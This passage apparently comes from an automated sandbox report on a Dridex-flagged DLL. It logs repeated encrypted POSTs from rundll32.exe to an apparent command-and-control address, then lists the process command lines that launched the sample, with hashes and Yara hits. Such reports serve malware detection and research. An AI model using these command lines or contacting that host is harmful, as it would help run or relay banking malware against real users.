                                                                                                      2021-10-28 03:04:30 UTC394OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:31 UTC399INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.449808192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:05 UTC39OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:05 UTC40OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:06 UTC44INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      80192.168.2.450167192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:33 UTC399OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:33 UTC399OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:34 UTC404INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      81192.168.2.450169192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:34 UTC404OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:34 UTC404OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:35 UTC409INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      82192.168.2.450175192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:38 UTC409OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:38 UTC409OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:39 UTC414INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      83192.168.2.450177192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:39 UTC414OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:39 UTC414OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:40 UTC419INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      84192.168.2.450183192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:42 UTC419OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:42 UTC419OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:43 UTC424INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      85192.168.2.450185192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:43 UTC424OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:43 UTC424OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:44 UTC429INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      86192.168.2.450191192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:46 UTC429OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:46 UTC429OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:47 UTC434INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.449812192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:07 UTC44OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:07 UTC45OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:08 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:05:00:40
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll'
                                                                                                      Imagebase:0x8c0000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.799249940.0000000001000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1188824547.000000006E361000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      General

                                                                                                      Start time:05:00:41
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:00:41
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Bluewing
                                                                                                      Imagebase:0x1210000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.764183510.0000000004D80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:00:41
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                                                                                                      Imagebase:0x1210000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.1191678149.000000006E361000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.763243563.0000000000600000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:00:45
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Earth
                                                                                                      Imagebase:0x1210000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000003.782470238.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:00:50
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Masterjust
                                                                                                      Imagebase:0x1210000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000003.799320451.00000000048E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >